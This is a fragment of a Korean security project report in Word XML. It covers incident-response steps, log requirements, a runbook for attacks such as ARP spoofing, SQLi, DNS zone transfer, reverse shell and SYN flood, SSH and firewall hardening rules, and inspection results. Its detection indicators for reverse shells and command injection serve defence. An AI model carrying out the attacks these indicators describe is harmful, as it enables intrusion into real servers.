          <w:tcPr>
            <w:tcW w:w="261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검증 방법</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="70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적용 전/후 동일 시나리오1을 재현하여 탐지/차단 여부를 확인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5.1-9.  증빙자료(삽입)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4252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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: LOG-5-04</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>PCAP/Wireshark/터미널/로그 캡처를 시나리오로 삽입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55"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5.2 대응 방안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대응 방안은 (1) 관제팀-운영팀 협조 체계, (2) 즉시 차단(Containment) 중심의 네트워크/서버 정책, (3) 재발 방지(근본 원인 제거) 항목으로 구성하였다.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5-8. 대응 프로세스(탐지</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>→분석→차단→복구</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="963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4277"/>
        <w:gridCol w:w="1900"/>
        <w:gridCol w:w="2409"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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단계</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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주요 활동</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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담당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산출물/증빙</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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1) 탐지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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경보/로그/패킷 이상 징후 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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관제팀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탐지 알림, 초기 증빙(PCAP/로그)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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2) 분석</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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공격 유형 분류, 영향도/범위 산정</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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관제팀+운영팀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분석 리포트, 타임라인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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3) 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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출발지/포트/서비스 차단, 계정 잠금</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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운영팀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방화벽/서버 정책 적용 결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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4) 제거</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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취약점 패치, 설정 변경, 악성 요소 제거</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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운영팀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조치 내역서</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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5) 복구</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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서비스 정상화, 모니터링 강화</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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운영팀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복구 체크리스트</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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6) 환류</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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재발방지 대책/룰 튜닝/문서화</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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관제팀+운영팀</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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업데이트, 교육/점검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5-9. 로그 제출 및 대응 협조 요청 기준(요약)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="963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2126"/>
        <w:gridCol w:w="2805"/>
        <w:gridCol w:w="1447"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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상황</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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필수 로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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권장 로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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제출 형태</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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 공격(정찰/SQLi/Command Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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access.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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error.log, WAF 로그(있을 시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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원본 파일 또는 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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정찰/브루트포스/침해</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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auth.log(/secure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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sshd 설정 파일 변경 이력</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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원본 파일 또는 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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 AXFR/의심 질의</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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named 로그(있을 시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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원본 파일 또는 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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DoS 의심</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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kern.log/dmesg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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방화벽/라우터 로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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원본 파일 또는 캡처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5-10. 시나리오 대응 Runbook(요약)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="958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871"/>
        <w:gridCol w:w="2834"/>
        <w:gridCol w:w="3117"/>
      </w:tblGrid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공격 유형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초기 확인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즉시 차단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재발방지</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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ARP Spoofing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동일 IP의 MAC 변경 반복 여부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스위치 보안 기능/정적 ARP 적용(환경에 따라)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네트워크 분리, ARP 모니터링(arpwatch) 적용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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FTP 스니핑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Payload 내 계정정보 노출 여부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FTP 차단/계정 비밀번호 변경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SFTP/FTPS 전환, 평문 서비스 제거</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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정찰/브루트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auth.log에서 반복 실패/스캔 패턴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 접근대역 제한 + iptables recent 자동 차단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키 기반 인증 강제, root 원격 로그인 금지</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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 AXFR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syslog에 AXFR started/ended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TCP 53 차단(Secondary DNS만 허용)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 설정 allow-transfer 제한</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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 정찰/SQLi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access.log에서 비정상 경로/페이로드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(내부 서비스일 경우) 80/443 접근대역 제한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WAF/입력검증/파라미터 바인딩 적용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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Reverse Shell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/vulnerabilities/exec/ 반복 POST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의심 IP 차단, 아웃바운드(egress) 제한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취약 기능 제거/패치, 권한 최소화</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="175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DoS(SYN Flood)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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kern.log/dmesg 경고 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283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율제한/상위 장비 차단(ACL)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서비스 보호(캐시/레이트리밋), 모니터링 강화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5-11. 차단 정책 적용 요약</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="963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4628"/>
        <w:gridCol w:w="3043"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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46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정책/설정</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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설명</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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root 로그인 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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PermitRootLogin no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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root 직접 로그인 금지(일반 계정 + sudo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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비밀번호 로그인 금지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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PasswordAuthentication no</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>PubkeyAuthentication yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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Brute Force 원천 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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 SSH 접근대역 제한</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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 allow from &lt;관리망IP&gt; to any port 22 proto tcp</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>ufw deny 22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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관리망/점프서버만 허용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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iptables Brute Force 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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-m recent --seconds 60 --hitcount 5 -j DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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60초 내 5회 이상 신규 연결 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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 AXFR 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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UDP 53 허용, TCP 53 기본 차단</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>Secondary DNS만 TCP 53 허용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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AXFR은 TCP 53 기반</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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 접근 통제(선택)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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80/443: &lt;TRUSTED_NET&gt;만 허용 후 DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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내부 전용 서비스 전제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5-7. 차단 정책 적용 터미널 출력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3118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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: TERM-5-05</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>sshd_config/UFW/iptables 적용 및 status/규칙 확인 화면 삽입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55"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5.3 보안 정책 구현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보안 정책 구현은 ‘탐지(Detect)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>–차단</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(Prevent)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>–운영</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(Operate)’ 관점에서 정리하였으며, 각 항목은 적용 여부와 검증 방법을 명확히 기록하도록 구성하였다.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5-12. 보안 정책 구현 매트릭스(요약)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9841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1889"/>
        <w:gridCol w:w="1776"/>
        <w:gridCol w:w="3870"/>
        <w:gridCol w:w="983"/>
      </w:tblGrid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영역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정책 항목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구현 위치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구현 내용(요약)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상태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계정/접근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root 직접 로그인 차단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서버(SSHD)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PermitRootLogin no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계정/접근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패스워드 로그인 금지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서버(SSHD)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PasswordAuthentication no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계정/접근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관리망만 SSH 허용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서버(UFW)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allow from &lt;관리망&gt;deny 22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네트워크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스캔/브루트포스 자동 차단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서버(iptables)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recent 모듈 기반 율제한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AXFR 제한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서버(UFW/iptables/DNS 설정)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TCP 53 제한, allow-transfer 통제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정찰 차단(내부 전용 시)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서버(iptables/UFW)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80/443 접근대역 제한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(선택)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로그 수집 기준 수립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운영절차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access/auth/syslog/kern 로그 제출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완료</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="132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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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 판별 기준 수립</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="177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 운영</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="387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Wireshark 필터/로그 패턴 정의</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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완료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5-13. iptables recent 옵션 의미(요약)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7875"/>
      </w:tblGrid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옵션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의미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--dport 22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포트 접근 대상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--state NEW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새 연결 시도에 한정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-m recent --set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접속 기록을 메모리에 저장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--name SSH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기록 이름(그룹)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--seconds 60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최근 60초 기준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--hitcount 5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5회 이상 시 차단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--rttl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동일 TTL 조건(위장 스캔 방지 보조)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="176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-j DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="787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조건 만족 시 패킷 폐기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5-14. 정책 검증 체크리스트(편집용)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="963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3286"/>
        <w:gridCol w:w="3513"/>
        <w:gridCol w:w="1305"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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점검 항목</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="328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명령/방법</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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기대 결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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SSHD 설정 반영</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="328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sshd -T | egrep 'permitrootlogin|passwordauthentication'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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nono</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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5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 규칙 적용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="328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 status verbose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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22/tcp 제한 규칙 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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5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iptables 규칙 적용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="328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iptables -S | egrep 'recent|dport 22'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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recent 규칙 존재</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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5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 TCP 53 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="328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 -lntup | grep ':53' + 방화벽 규칙 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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정책 의도대로 제한</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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  <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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 접근 통제(선택)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="328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curl/브라우저 접근 테스트</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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비허용 대역 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="130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5-8. 보안 정책 적용 전/후 검증 캡처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3118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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: IMG-5-08</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>점검 체크리스트 결과(터미널/로그/관제 화면) 캡처를 항목별로 삽입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r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="55"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5.4 주정통 기반 보안점검 결과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주정통(주요정보통신기반시설) 기술적 점검 가이드 기반으로 선별한 점검 항목을 대상으로 자동화 점검(스크립트)과 수동 점검(로그/설정 확인)을 병행하여 결과를 정리하였다. 점검 항목/코드 체계는 프로젝트에서 선정한 기준에 맞춰 수정 가능하도록 표 형태로 구성하였다.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5-15. 주정통 기반 점검 수행 절차(요약)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="963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5647"/>
        <w:gridCol w:w="3213"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="77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단계</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56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내용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산출물</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="77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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56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점검 대상 서버 목록(DB) 등록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자산 목록</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="77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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56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점검 항목(선정) 정의 및 자동화/수동 분류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점검 항목표</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="77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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56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기반 점검 명령 수행 및 결과 파싱/저장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점검 결과(DB/리포트)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="77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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56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결과 가시화(웹 페이지/대시보드)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대시보드 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="77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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56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미흡 항목 조치 후 재점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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조치 내역 및 재점검 결과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5-16. 자동화 스크립트/함수(요약, 참고: 기획안 주정통 코드 부분)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="963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832"/>
        <w:gridCol w:w="2002"/>
        <w:gridCol w:w="2115"/>
        <w:gridCol w:w="1436"/>
        <w:gridCol w:w="1606"/>
      </w:tblGrid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NO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스크립트/함수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대상 서버/OS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주요 기능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입력 예시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출력/결과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1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init_ssh + menu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Ubuntu/Rocky9(Core)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DHCP/Apache/VHost/PHP/phpMyAdmin/FTP/MariaDB 설치 선택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IP:172.16.16.1, [1-3]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서비스 활성 + index.html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2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apa_in(), apa_ch_dir_in()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Rocky9(Web EN/KR)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Apache + VirtualHost(team1.com) + DocRoot 변경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/home/team1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httpd.conf 수정 + 재시작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3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smb_install(), go()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Rocky9(Storage)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Samba 설치/공유 + user 생성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PW: (마스킹)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smbd/nmbd active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4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install_and_configure(), main()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Ubuntu(MB)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TigerVNC + GNOME + xstartup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PW: (마스킹), :5901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vncserver@:1 active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5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nfs_install(), main()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Rocky9(Storage)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NFS utils + 공유 + 마운트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NFS IP:172.16.16.100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exportfs -v 확인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6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download(), main()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Rocky9(MB-Monitorix)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Monitorix 설치/재시작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systemctl status monitorix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7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install_gnome(), main()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Rocky9(MB)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XRDP + GNOME + user 생성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user:team1, PW: (마스킹)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xrdp active(3389)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8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install(), mod_zone()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Rocky9(DNS)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BIND + zone + 동적 A 레코드 편집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dns_data.txt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nslookup 성공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9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format_partition(), main()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Ubuntu(ST-R5/10)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Partition/FMT/ext4 + fstab + Disk Quota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/dev/sda1, /jupyter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repquota 제한 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="183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cc(cmd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200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모든 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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명령 실행 + 출력 파싱/오류 처리</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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임의 cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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stdout/stderr 실시간 출력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5-17. 주정통 기반 보안점검 결과(요약, 편집용)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="996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2226"/>
        <w:gridCol w:w="1207"/>
        <w:gridCol w:w="1547"/>
        <w:gridCol w:w="1207"/>
        <w:gridCol w:w="2396"/>
      </w:tblGrid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점검 영역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점검 항목(기준)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점검 방법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대상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결과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조치/비고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접근통제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root 원격 로그인 금지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수동/자동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대상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PermitRootLogin no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접근통제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패스워드 로그인 금지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수동/자동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대상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PasswordAuthentication no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네트워크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관리망만 SSH 허용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수동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대상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UFW allow/deny 규칙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네트워크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브루트포스/스캔 차단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수동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SSH 대상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iptables recent 규칙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AXFR 제한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수동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DNS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TCP 53 제한 + Secondary DNS 허용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정찰 차단(내부 전용 시)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선택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80/443 접근대역 제한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애플리케이션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SQLi 방어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수동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WAF/코드 보완 필요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필수 로그 수집/제출 기준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운영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전 서버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완료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표준 제출 항목 정의</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="137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-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="222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(추가 기입)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154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120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239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표 5-18. 보완 필요 항목 및 개선 로드맵</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
